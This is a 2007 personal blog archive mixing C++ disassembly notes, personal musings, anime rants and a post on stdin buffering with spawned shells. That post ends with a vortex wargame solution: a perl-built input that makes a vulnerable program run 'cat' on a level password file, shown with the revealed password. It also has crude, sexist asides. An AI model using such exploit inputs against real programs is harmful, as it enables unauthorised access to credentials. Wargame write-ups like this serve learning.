in the name of zero

March 31, 2007

object oriented concepts newbie

Filed under: hermetic studies

i’ve decided to ditch java and tackle c++ and c# this summer!

“A single question can be more influential than a thousand statements.”
Bo Bennett

by some malevolent influence yesterday, i found myself looking for c plus plus object oriented programming tutorials. i made steady progress for a few minutes until after my nth compilation. got sidetracked when i realized that i haven’t actually encountered any c++ crackmes at the usual place.

so i’m posting my experiments here in the hopes of finding someone to point me to some related articles on the subject matter.

#include <iostream>   /* the listing needs iostream for cout */
using namespace std;

/* gcc extension: runs before main() is entered */
void __attribute__ ((constructor)) myctor()
{
        cout<<"--- little red riding hood goes to the farm ---\n";
}

/* gcc extension: runs after main() returns */
void __attribute__ ((destructor)) mydtor()
{
        cout<<"--- little red riding hood  goes home ---\n";
}

class sheep {
        int offspring;          /* the only data member: the object is one int */

        public:
                sheep(void);    /* default constructor */
                sheep(int);     /* overloaded constructor used in main() */
                ~sheep(void);
                int get_offspring(void);
};

sheep::sheep(void)
{
        offspring = 0;
}

sheep::sheep(int x)
{
        cout<<"mommy sheep is having sex with daddy sheep\n";
        offspring = x;          /* stored at offset 0 of the object */
}

sheep::~sheep(void)
{
        cout<<"mommy sheep dies after giving birth\n";
}

int sheep::get_offspring(void)
{
        return offspring;
}

int main(int t, char **c)
{
        sheep philippine_sheep(5);      /* calls sheep::sheep(int) */

        cout<<"they have "<<philippine_sheep.get_offspring()<<" babies\n";

        cout<<"\n\tgoddamn i feel like a chump!\n";

        return 0;
}

“so what’s it like under the hood?” i was curious so i peeked a little.

the first thing i noticed (thru “strings”) is that it uses libstdc++.so and not libc.so; that’s rather easy to figure out from the filenames alone. then from what i saw in objdump, the procedure linkage table is totally different from that of a c binary. it also bothered me a bit that i couldn’t find “cout” anywhere… i moved along. (i discovered something about it later though)

before going further, i used objdump --demangle to make reading more convenient.

entry startup is familiar as it’s still the usual libc startup i’ve encountered many times. push registers, envp, argv, argc .. and then jump to __libc_start_main(). before jumping to main(), i browsed a little bit and saw the disassembly of the class methods i made. so far so good.

my first question: how come there are two (2) definitions of each method!? disassembly below:

0804881c <sheep::sheep()>:
 804881c:       55                      push   ebp
 804881d:       89 e5                   mov    ebp,esp
 804881f:       8b 45 08                mov    eax,DWORD PTR [ebp+8]
 8048822:       c7 00 00 00 00 00       mov    DWORD PTR [eax],0x0
 8048828:       c9                      leave
 8048829:       c3                      ret    
	
0804882a <sheep::sheep()>:
 804882a:       55                      push   ebp
 804882b:       89 e5                   mov    ebp,esp
 804882d:       8b 45 08                mov    eax,DWORD PTR [ebp+8]
 8048830:       c7 00 00 00 00 00       mov    DWORD PTR [eax],0x0
 8048836:       c9                      leave
 8048837:       c3                      ret    

this is where it started getting interesting.

instantiating a class seems like lots of work. in my program, i used the overloaded constructor which takes an int parameter.

 ; sheep philippine_sheep(5);
	
 80487de:       6a 05                   push   0x5		; constructor argument
 80487e0:       8d 45 e8                lea    eax,[ebp-24]	; addr of object
 80487e3:       50                      push   eax		; push addr of object as well
 80487e4:       e8 75 ff ff ff          call   804875e <sheep::sheep(int)> ; call the class constructor. (right?)
 

i followed sheep::sheep(int) … again, there are two definitions of this.

0804875e <sheep::sheep(int)>:
 804875e:       55                      push   ebp
 804875f:       89 e5                   mov    ebp,esp		; prolog
 8048761:       83 ec 08                sub    esp,0x8
 8048764:       83 ec 08                sub    esp,0x8		; 0x10 space
 8048767:       68 c0 8a 04 08          push   0x8048ac0	; "mommy sheep is having sex..."
 804876c:       68 b8 9e 04 08          push   0x8049eb8	; cout@glibcpp
 8048771:       e8 5a fe ff ff          call   80485d0		; std::basic_ostream....
 8048776:       83 c4 10                add    esp,0x10		; cleanup
 8048779:       8b 55 08                mov    edx,DWORD PTR [ebp+8]	; main() local var...
 804877c:       8b 45 0c                mov    eax,DWORD PTR [ebp+12]	; constructor argument (5)
 804877f:       89 02                   mov    DWORD PTR [edx],eax	; save it inside the object
 8048781:       c9                      leave  				; epilog
 8048782:       c3                      ret    				; return to caller
 8048783:       90                      nop				; no operation

i learned two things here. first, i found out that “cout” is not being called directly (perhaps other functions as well).

Disassembly of section .bss:
	
08049eb8 <std::cout@@GLIBCPP_3.2>:

the second is how an object’s variables are being handled (basically). to verify, i ran gdb.

gdb $ hb *0x080487e4
	
gdb $ r
--- little red riding hood goes to the farm ---
Breakpoint 1, 0x080487e4 in main ()
	
gdb $ nexti
mommy sheep is having sex with daddy sheep
0x080487e9 in main ()
	
gdb $ reg
     eax:00000005 ebx:B7EE0FF4  ecx:0000000A  edx:BFFE9450     eflags:00000282
     esi:B7FEDC80 edi:BFFE94C4  esp:BFFE9430  ebp:BFFE9468     eip:080487E9
     cs:0073  ds:007B  es:007B  fs:0000  gs:0000  ss:007B    o d I t S z a p c 
	
gdb $ x/x $edx
0xbffe9450:     0x00000005
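An added example (mine, not the post’s code) that puts the same three observations in source form: the object is just its one int, the first word of its storage is the constructor argument that x/x $edx showed, and “cout” can’t be found as a function because it is an object whose address gets passed to operator<<. An ostringstream stands in for cout so the result can be checked; function names are my own.

```cpp
#include <cstddef>
#include <cstring>
#include <ostream>
#include <sstream>
#include <string>

// The post's class, minus the chatter, so only the data member remains.
class sheep {
        int offspring;
public:
        sheep() : offspring(0) {}
        explicit sheep(int x) : offspring(x) {}
        int get_offspring() const { return offspring; }
};

// The object really is just its data: one int and nothing else. No hidden
// vtable pointer appears because the class has no virtual functions.
std::size_t sheep_size() { return sizeof(sheep); }

// What "x/x $edx" read in gdb: the first word of the object's storage is
// the constructor argument, put there by "mov DWORD PTR [edx],eax", with
// edx holding the hidden first argument (the object's address, [ebp+8]).
// memcpy of the object representation is the portable way to peek at it.
int first_word_of(const sheep &s)
{
        int word = 0;
        std::memcpy(&word, &s, sizeof word);
        return word;
}

// The "cout" that strings/objdump could not find as a function: cout is a
// global object (the .bss symbol std::cout@@GLIBCPP_3.2), and "cout << text"
// is a call to operator<<(ostream&, const char*) with &cout as its first
// argument. That is the "push string, push &cout, call basic_ostream..."
// sequence in the constructor's disassembly. The upcast to ostream& below is
// what the compiler does implicitly when you write "oss << text".
std::string stream_as_the_compiler_calls_it(const char *text)
{
        std::ostringstream oss;
        std::ostream &ret = std::operator<<(static_cast<std::ostream &>(oss), text);
        return (&ret == &oss) ? oss.str() : std::string("operator<< returned a different stream");
}
```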

i guess that wraps my first few steps in learning object oriented programming. will post more as soon as able.

March 28, 2007

so what now?

“Experience keeps a dear school, but fools will learn in no other.”
benjamin franklin

i’m fresh outta college and currently enjoying freedom. (mostly because it took me six years to get through) many of my classmates have said their goodbyes. some have already left carrying with them the promise of employment and all the luxuries and benefits that come with the degree they recently got. at this point though, i’m pretty certain that i won’t be using the calculus and advanced math concepts i learned from school. also the chemistry and some of the physics concepts.

looking at my graduation again this time with my hormones in check, i feel kinda sad that school’s over. after all, university is the only place in this city where you can find high quality chicks! usually comes in three flavors:

a) one with all the beauty… and rich.
b) one with all the brains… and rich.
c) one with both all the beauty and all the brains and above all… rich.

that’s that.

for the most part, i’m just slacking off these days, just watching full anime seasons every day. sometimes, i walk (on my usual route) to the internet cafe near my school to play DoTA. quickly becoming a daily routine if you ask me.

“There’s only one thing money won’t buy, and that is poverty.”
joe lewis

faced with the prospect of getting work soon, my original plan was to make easy money by becoming a call center agent in some company some place up north. actually, i’m still entertained by that idea until now. recruitments will be held this coming april and me and my friends agreed that we’d give it a shot. after all, the only important requirement is to be “able to speak functional english”.

summer also means that i must again take up a new hobby and/or continue my old ones. usually, i settle for learning a new programming language (of my liking) and doing some fun stuff with my chosen PL.

coz no one wants a C guy nowadays… i’m practically screwed. so again with the prospect of getting work, i’m giving learning java and “some of the bullshit that comes with it” a shot. that is where the money is “apparently” nowadays. or so i think.

“Love is but the discovery of ourselves in others, and the delight in the recognition.”
alexander smith

i guess she’s finishing up packing her stuff as i’m typing this entry. she’s going to cebu for a job interview and the thought about not seeing her again and missing her kicked in kinda late. i’m such an asshole.

thinking about her brings back vivid memories of our trip to cagayan! it’s a story i’ll be sure to tell my grandsons if i’ll have any…

this is niel. signing off.

March 22, 2007

always, always, always

female characters who can’t seem to handle their own feelings screw up a good story’s mood.

exhibit a - chiharu (boys be)

high school love turned sour. apparently, they still remained friends. or at least that’s what i think after the season’s last episode. i hate her.

exhibit b - oboro (kouga ninja scrolls)

oboro was from the iga ninja clan. in the anime version (basilisk), her eyes were known as the “ninja spell breaking eyes”. no form of ninjutsu can work against her. using a ninja technique on her proved to be fatal for the caster. her lover on the other hand also has special eyes. kouga gennosuke of the kouga ninja clan. in the anime version, he is able to use the enemies’ techniques (physical or ninjutsus) against themselves. just by staring at them. at the end of the story, the guy (gennosuke) let oboro win. i hate her.

exhibit d - mikumari (samurai 7)

i hate her.

exhibit e - xiao long nu (return of condor heroes 2006)

acted by “crystal” liu yi fei.

very cute. very pretty. very sexy. godlike gracefulness. excellent martial arts. but she gave yang guo heartaches so painful, it will make even the devil cry. i’m also tempted to say “i hate her”, but (altogether now) very cute. very pretty. very sexy.

exhibit f - so seo no (ju mong)

acted by han hye jin.

now, here’s a girl who’s strong. she’s got the business skills to rival bill gates. seriously. then she began showing signs of weakness later on. she married wu tae to avoid marriage with dae so but she loved ju mong deep down.

i finally finished watching the entire season’s last episode ten minutes ago, and i must say, all that drama about “self exile” and giving way to the rightful “first wife” (ye so ya) was abso-fucking-lutely unnecessary. i still haven’t made up my mind if i hate her or not.

so is there any female character out there who’s not pathetic? yup! lacus klein - gundam seed.

thanks for your time.

March 13, 2007

ok this is whacked!

the concepts presented, i guess are common knowledge… but the answers elude me somehow. (and listening to Metallica Music doesn’t help for some reason.)

f*ck!

consider the following:

/* shitprog.c */

#include <stdio.h>      /* NULL */
#include <unistd.h>     /* execlp() */

int main(int t, char **c)
{
	/* replace this process image with an interactive shell */
	execlp("/bin/sh", "sh", "-i", NULL);
	return 0;
}

fairly easy to figure out, don’t you agree?

now for some output:

misha@heaven ~ $ ./shitprog
sh-3.00$ 

as expected. we have a shell! next, let’s try passing commands to the shell via stdin.

misha@heaven ~ $ echo "whoami" | ./shitprog
sh-3.00$ misha
sh-3.00$ exit

still working as expected so far…

to further build my case, let’s try messing with stdin before calling execlp() shall we? (i used getchar())

/* anothershitprog.c */

#include <stdio.h>      /* getchar(), NULL */
#include <unistd.h>     /* execlp() */

int main(int t, char **c)
{
	/* read one character from stdin through stdio before the exec */
	getchar();

	execlp("/bin/sh", "sh", "-i", NULL);
	return 0;
}

again, let’s try running it.

misha@heaven ~ $ ./anothershitprog
f
sh-3.00$

this time, the program waits for me to press a key then the execlp() resolves…

so how about a command via stdin like what we did before?

misha@heaven ~ $ echo "whoami" | ./anothershitprog
sh-3.00$ exit

what the fuck!? it just exits!

i finally solved the problem by writing 4096 bytes of garbage immediately preceding my “command”, like so:

misha@heaven ~ $ echo $(perl -e 'print "a"x4096, "whoami"') | ./anothershitprog
sh-3.00$ misha
sh-3.00$ exit

i tried this same method in pulltheplug.org’s level 2 vortex challenge, but was not as successful. the “pad to 4096″ trick doesn’t work.

luckily… the number of “/” in front of a command doesn’t make any difference. so /bin/ls is the same as ///////////bin/ls.

so this is how my session went:

level1@vortex ~ $ echo $(perl -e 'print "\\"x257,"\xca","/"x3838, "bin/cat /etc/pass/level2"') | /levels/level1
sh-3.1$ 23anbT\rE
sh-3.1$ exit

that’s how i got the pass for level 2.

anyone care to fill me in with the gray areas? it’s 12:38 am and i’m totally wasted.
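The gray area is stdio buffering, and here is an added example (mine, not from the post) that shows it: getchar() doesn’t take one byte from the pipe, it fills stdin’s buffer (4096 bytes for a pipe under glibc, which is where the magic number comes from), and after execlp() the new shell inherits only the file descriptor, not that buffer. With a bare "whoami\n" the whole command is swallowed and sh sees EOF; with 4096 bytes of padding the padding is swallowed and "whoami\n" is still in the pipe. The function below is my own and assumes Linux/glibc: it builds the pipe contents in memory, reads one character the way the post’s getchar() did, once buffered and once with buffering turned off (what read(2) on fd 0 would do), and counts what a would-be shell would still find.

```cpp
#include <cstddef>
#include <cstdio>
#include <vector>
#include <unistd.h>

// Fill a pipe with `total` bytes, pull ONE character through a stdio FILE*
// (what getchar() on stdin does), then count how many bytes the kernel still
// holds in the pipe. After execlp() the new program inherits only the file
// descriptor; whatever stdio read ahead into its buffer dies with the old
// process image, and that is what the shell never got to see.
long bytes_left_after_one_getc(std::size_t total, bool unbuffered)
{
        int fds[2];
        if (pipe(fds) != 0) return -1;

        std::vector<char> payload(total, 'a');        // constructed stand-in for echo's output
        if (write(fds[1], payload.data(), total) != static_cast<ssize_t>(total)) return -1;
        close(fds[1]);                                // writer is done: reads end at EOF

        FILE *fp = fdopen(fds[0], "r");
        if (fp == nullptr) return -1;
        if (unbuffered) setvbuf(fp, nullptr, _IONBF, 0);   // behaves like read(fd, &c, 1)

        if (getc(fp) != 'a') return -1;               // the post's lone getchar()

        // Drain the raw descriptor: this is what a process started with
        // execlp() would find on its fd 0.
        long left = 0;
        char scratch[512];
        ssize_t n;
        while ((n = read(fds[0], scratch, sizeof scratch)) > 0) left += n;
        fclose(fp);
        return left;
}

int main()
{
        // 4096 bytes of padding plus "whoami\n": the post's working input.
        const std::size_t total = 4096 + 7;
        std::printf("buffered getchar(): %ld bytes left for the shell\n",
                    bytes_left_after_one_getc(total, false));
        std::printf("unbuffered read   : %ld bytes left for the shell\n",
                    bytes_left_after_one_getc(total, true));
        return 0;
}
```

On glibc/Linux the buffered run leaves 7 bytes (exactly "whoami\n") because stdio sizes a pipe’s buffer from st_blksize, which is 4096, while the unbuffered run leaves 4102; a program that must hand its stdin to a child should read with read(2) or set _IONBF before the exec.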
